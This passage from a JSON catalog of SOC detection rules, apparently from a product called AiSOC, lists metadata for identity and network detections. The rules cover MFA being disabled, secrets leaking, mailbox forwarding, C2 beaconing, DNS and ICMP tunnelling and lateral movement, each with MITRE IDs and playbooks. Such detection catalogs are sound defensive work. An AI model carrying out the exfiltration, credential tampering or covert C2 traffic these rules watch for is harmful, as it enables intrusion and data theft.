"detections/identity/ident-ping-admin-role-burst.yaml" }, { "id": "det-identity-130", "type": "detection", "name": "PingID Device Removed From Privileged User", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'PingID Device Removed From Privileged User'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1556.006" ], "log_source": "ping", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-ping-pingid-device-removed.yaml" }, { "id": "det-identity-131", "type": "detection", "name": "PingOne Policy Bypass Applied To 'Everyone'", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'PingOne Policy Bypass Applied To 'Everyone''. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1556" ], "log_source": "ping", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-ping-policy-bypass-everyone.yaml" }, { "id": "det-identity-132", "type": "detection", "name": "Ping Trust Store Certificate Added", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Ping Trust Store Certificate Added'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1553.004" ], "log_source": "ping", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-ping-trust-store-modified.yaml" }, { "id": "det-identity-133", "type": "detection", "name": "Keycloak Master Realm User Created", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Keycloak Master Realm User Created'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1136" ], "log_source": "keycloak", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-keycloak-master-realm-user-created.yaml" }, { "id": "det-identity-134", "type": "detection", "name": "Keycloak realm-admin Role Granted", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Keycloak realm-admin Role Granted'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1098" ], "log_source": "keycloak", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-keycloak-admin-realm-role-grant.yaml" }, { "id": "det-identity-135", "type": "detection", "name": "Keycloak Client Secret Regenerated", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Keycloak Client Secret Regenerated'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1098.001" ], "log_source": "keycloak", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-keycloak-client-secret-regen.yaml" }, { "id": "det-identity-136", "type": "detection", "name": "Keycloak User Impersonation Used", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Keycloak User Impersonation Used'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1078" ], "log_source": "keycloak", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-keycloak-impersonation-used.yaml" }, { "id": "det-identity-137", "type": "detection", "name": "Generic OIDC Issuer Trust Modified", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Generic OIDC Issuer Trust Modified'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1556" ], "log_source": "identity", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-oidc-issuer-trust-changed.yaml" }, { "id": "det-identity-138", "type": "detection", "name": "OIDC Client Burst Created By Single Actor", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'OIDC Client Burst Created By Single Actor'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1136" ], "log_source": "identity", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-oidc-many-clients-from-single-actor.yaml" }, { "id": "det-identity-139", "type": "detection", "name": "OIDC Client Secret Logged In Plaintext", "description": "AiSOC v1 curated detection. 
Triggers on the identity signal described by 'OIDC Client Secret Logged In Plaintext'.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1552.004" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-oidc-secret-leaked-pattern.yaml" }, { "id": "det-identity-140", "type": "detection", "name": "OIDC Client Configured With Wildcard Redirect URI", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'OIDC Client Configured With Wildcard Redirect URI'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1539" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-oidc-redirect-uri-wildcard.yaml" }, { "id": "det-identity-141", "type": "detection", "name": "Google Workspace 2SV Disabled For Admin", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Google Workspace 2SV Disabled For Admin'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1556.006" ], "log_source": "google-workspace", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-google-workspace-mfa-disabled-priv.yaml" }, { "id": "det-identity-142", "type": "detection", "name": "Google Workspace App Password Issued To Priv User", "description": "AiSOC v1 curated detection. 
Triggers on the identity signal described by 'Google Workspace App Password Issued To Priv User'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1556.006" ], "log_source": "google-workspace", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-google-workspace-app-pw-issued.yaml" }, { "id": "det-identity-143", "type": "detection", "name": "Google Workspace 3rd-Party App Granted Drive Read", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Google Workspace 3rd-Party App Granted Drive Read'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1528" ], "log_source": "google-workspace", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-google-workspace-3p-app-data-grant.yaml" }, { "id": "det-identity-144", "type": "detection", "name": "Google Workspace Login Flagged 'Suspicious'", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Google Workspace Login Flagged 'Suspicious''. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1078" ], "log_source": "google-workspace", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-google-workspace-suspicious-login-flag.yaml" }, { "id": "det-identity-145", "type": "detection", "name": "M365 Inbox Rule Forwards To External Address", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'M365 Inbox Rule Forwards To External Address'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1114.003" ], "log_source": "m365", "playbook": "tpl-collection", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-m365-mailbox-rule-forward-external.yaml" }, { "id": "det-identity-146", "type": "detection", "name": "M365 Mailbox Permission Granted To External User", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'M365 Mailbox Permission Granted To External User'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1098" ], "log_source": "m365", "playbook": "tpl-collection", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-m365-mailbox-permission-add-foreign.yaml" }, { "id": "det-identity-147", "type": "detection", "name": "M365 App Granted Mail.Read / Mail.ReadWrite", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'M365 App Granted Mail.Read / Mail.ReadWrite'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1528" ], "log_source": "m365", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-m365-app-consent-graph-mail.yaml" }, { "id": "det-identity-148", "type": "detection", "name": "M365 SharePoint Sharing Policy 'Anyone' Enabled", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'M365 SharePoint Sharing Policy 'Anyone' Enabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1530" ], "log_source": "m365", "playbook": "tpl-data-exposure", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-m365-sharing-policy-anyone.yaml" }, { "id": "det-identity-149", "type": "detection", "name": "M365 Temporary Access Pass Generated For Priv", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'M365 Temporary Access Pass Generated For Priv'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1556.006" ], "log_source": "m365", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-m365-tap-removed-priv.yaml" }, { "id": "det-identity-150", "type": "detection", "name": "Slack Workspace 2FA Disabled", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Slack Workspace 2FA Disabled'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1556" ], "log_source": "slack", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-slack-workspace-2fa-disabled.yaml" }, { "id": "det-identity-151", "type": "detection", "name": "Slack App Installed With Bot Scope chat:write.public", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Slack App Installed With Bot Scope chat:write.public'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1525" ], "log_source": "slack", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-slack-app-installed-bot-token.yaml" }, { "id": "det-identity-152", "type": "detection", "name": "Slack Channel Shared Externally", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Slack Channel Shared Externally'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1567" ], "log_source": "slack", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-slack-channel-shared-external.yaml" }, { "id": "det-identity-153", "type": "detection", "name": "GitHub Org 2FA Requirement Disabled", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'GitHub Org 2FA Requirement Disabled'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1556" ], "log_source": "github", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-github-org-2fa-disabled.yaml" }, { "id": "det-identity-154", "type": "detection", "name": "GitHub Classic PAT Created With repo+workflow+admin:org", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'GitHub Classic PAT Created With repo+workflow+admin:org'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1098.001" ], "log_source": "github", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-github-pat-classic-created-with-broad-scopes.yaml" }, { "id": "det-identity-155", "type": "detection", "name": "GitHub Org Bulk Member Removed", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'GitHub Org Bulk Member Removed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1531" ], "log_source": "github", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-github-org-collaborator-removed-bulk.yaml" }, { "id": "det-identity-156", "type": "detection", "name": "GitHub Deploy Key Added Across Many Repos", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'GitHub Deploy Key Added Across Many Repos'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1098.001" ], "log_source": "github", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-github-deploy-key-added-org-wide.yaml" }, { "id": "det-identity-157", "type": "detection", "name": "Zoom Account Policy Disables Meeting Passcode", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Zoom Account Policy Disables Meeting Passcode'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1556" ], "log_source": "zoom", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-zoom-passcode-disabled-meeting-policy.yaml" }, { "id": "det-identity-158", "type": "detection", "name": "Atlassian Org 2FA Requirement Removed", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Atlassian Org 2FA Requirement Removed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1556" ], "log_source": "atlassian", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-atlassian-org-required-2fa-off.yaml" }, { "id": "det-identity-159", "type": "detection", "name": "Atlassian Org API Token Created", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Atlassian Org API Token Created'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1098.001" ], "log_source": "atlassian", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-atlassian-api-token-created.yaml" }, { "id": "det-identity-160", "type": "detection", "name": "MDM Policy Removed Requiring Device Compliance", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'MDM Policy Removed Requiring Device Compliance'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1556" ], "log_source": "mdm", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-jamf-mdm-policy-mfa-removed.yaml" }, { "id": "det-network-001", "type": "detection", "name": "C2 Beacon Pattern (Periodic High-Frequency)", "description": "Detects highly periodic outbound network connections to a single destination, characteristic of command-and-control (C2) beaconing from implants. 
Combines connection count and interval consistency to reduce false positives from telemetry agents.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1071.001" ], "log_source": "ndr", "playbook": "tpl-c2", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/c2-beacon-high-frequency.yaml" }, { "id": "det-network-002", "type": "detection", "name": "DNS Tunneling / Exfiltration (High Length Subdomains)", "description": "Detects DNS tunnelling activity characterised by abnormally long subdomain labels and high query volume to a single parent domain. Common technique for covert data exfiltration that bypasses egress filtering on standard ports.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1048.003" ], "log_source": "dns", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/dns-data-exfiltration.yaml" }, { "id": "det-network-003", "type": "detection", "name": "Internal Network Port Scan", "description": "Detects horizontal and vertical port scanning activity originating from inside the network. Often the first sign of an attacker performing reconnaissance after gaining an initial foothold.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1046" ], "log_source": "ndr", "playbook": "tpl-recon", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/port-scan-internal.yaml" }, { "id": "det-network-004", "type": "detection", "name": "SSH Brute-Force From Internet", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'SSH Brute-Force From Internet'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1110.001" ], "log_source": "linux", "playbook": "tpl-account-compromise", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/ssh-failed-from-internet.yaml" }, { "id": "det-network-005", "type": "detection", "name": "SMB Lateral Movement (Many ADMIN$ Connections)", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'SMB Lateral Movement (Many ADMIN$ Connections)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1021.002" ], "log_source": "windows", "playbook": "tpl-lateral-movement", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/smb-lateral-movement.yaml" }, { "id": "det-network-006", "type": "detection", "name": "RDP From Internet to Internal Host", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'RDP From Internet to Internal Host'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "network", "mitre_techniques": [ "T1133" ], "log_source": "ndr", "playbook": "tpl-cloud-anomaly", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/rdp-from-internet.yaml" }, { "id": "det-network-007", "type": "detection", "name": "Outbound Connection to Known Tor Exit", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Outbound Connection to Known Tor Exit'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1090.003" ], "log_source": "ndr", "playbook": "tpl-c2", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/tor-traffic.yaml" }, { "id": "det-network-008", "type": "detection", "name": "Outbound HTTP(S) to Newly Registered Domain", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Outbound HTTP(S) to Newly Registered Domain'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1071.001" ], "log_source": "proxy", "playbook": "tpl-c2", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/newly-registered-domain-traffic.yaml" }, { "id": "det-network-009", "type": "detection", "name": "DNS Fast-Flux (Many Distinct A-Records / Short TTL)", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'DNS Fast-Flux (Many Distinct A-Records / Short TTL)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1568.001" ], "log_source": "dns", "playbook": "tpl-c2", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/dns-fast-flux.yaml" }, { "id": "det-network-010", "type": "detection", "name": "SMB Authentication Without Signing", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'SMB Authentication Without Signing'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1557.001" ], "log_source": "windows", "playbook": "tpl-credential-theft", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/smb-signing-disabled-auth.yaml" }, { "id": "det-network-011", "type": "detection", "name": "Rogue DHCP Server Detected on LAN", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Rogue DHCP Server Detected on LAN'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1557" ], "log_source": "ndr", "playbook": "tpl-credential-theft", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/dhcp-rogue-server.yaml" }, { "id": "det-network-012", "type": "detection", "name": "ICMP Tunneling Pattern (Large Payloads)", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'ICMP Tunneling Pattern (Large Payloads)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1095" ], "log_source": "ndr", "playbook": "tpl-c2", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/icmp-tunnel.yaml" }, { "id": "det-network-013", "type": "detection", "name": "Outbound TLS to Server with Self-Signed Cert (Non-Allowed)", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Outbound TLS to Server with Self-Signed Cert (Non-Allowed)'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1573.002" ], "log_source": "ndr", "playbook": "tpl-c2", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/tls-self-signed-cert-conn.yaml" }, { "id": "det-network-014", "type": "detection", "name": "TLS JA3 Hash in Threat-Intel Match", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'TLS JA3 Hash in Threat-Intel Match'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1071.001" ], "log_source": "ndr", "playbook": "tpl-c2", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/tls-ja3-anomaly.yaml" }, { "id": "det-network-015", "type": "detection", "name": "Outbound Traffic to Rare/Suspicious ASN", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Outbound Traffic to Rare/Suspicious ASN'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1071.001" ], "log_source": "ndr", "playbook": "tpl-c2", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/egress-to-rare-asn.yaml" }, { "id": "det-network-016", "type": "detection", "name": "SMB Null Session Attempt", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'SMB Null Session Attempt'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1135" ], "log_source": "windows", "playbook": "tpl-recon", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/smb-null-session.yaml" }, { "id": "det-network-017", "type": "detection", "name": "LDAP Bind from Workstation to Domain Controller (Excessive)", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'LDAP Bind from Workstation to Domain Controller (Excessive)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1087.002" ], "log_source": "windows", "playbook": "tpl-recon", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/ldap-bind-anomaly.yaml" }, { "id": "det-network-018", "type": "detection", "name": "SNMP Public Community String Probe From Internet", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'SNMP Public Community String Probe From Internet'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1190" ], "log_source": "ndr", "playbook": "tpl-recon", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/snmp-public-community-internet.yaml" }, { "id": "det-network-019", "type": "detection", "name": "SYN Flood Pattern Against Public Endpoint", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'SYN Flood Pattern Against Public Endpoint'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1498.001" ], "log_source": "ndr", "playbook": "tpl-ddos", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/ddos-syn-flood.yaml" }, { "id": "det-network-020", "type": "detection", "name": "Outbound Connection to Threat-Intel-Blocked IP", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Outbound Connection to Threat-Intel-Blocked IP'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1071.001" ], "log_source": "ndr", "playbook": "tpl-c2", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/egress-to-blocklisted-ip.yaml" }, { "id": "det-network-021", "type": "detection", "name": "Internal Host Spamming SMTP", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Internal Host Spamming SMTP'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1566" ], "log_source": "ndr", "playbook": "tpl-malware-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/internal-host-spamming-mail.yaml" }, { "id": "det-network-022", "type": "detection", "name": "RDP Logon Session With Concurrent Active Console Session", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'RDP Logon Session With Concurrent Active Console Session'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1021.001" ], "log_source": "windows", "playbook": "tpl-account-anomaly", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/rdp-screen-takeover.yaml" }, { "id": "det-network-023", "type": "detection", "name": "Outbound IPv6 Teredo / 6to4 Tunneling Traffic", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Outbound IPv6 Teredo / 6to4 Tunneling Traffic'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1572" ], "log_source": "ndr", "playbook": "tpl-c2", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/ipv6-tunnel-outbound.yaml" }, { "id": "det-network-024", "type": "detection", "name": "DNS-over-HTTPS to Non-Approved Resolver", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'DNS-over-HTTPS to Non-Approved Resolver'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1071.004" ], "log_source": "proxy", "playbook": "tpl-c2", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/dns-over-https-rare.yaml" }, { "id": "det-network-025", "type": "detection", "name": "Outbound FTP Bulk Transfer From Non-Allowlisted Host", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Outbound FTP Bulk Transfer From Non-Allowlisted Host'. 
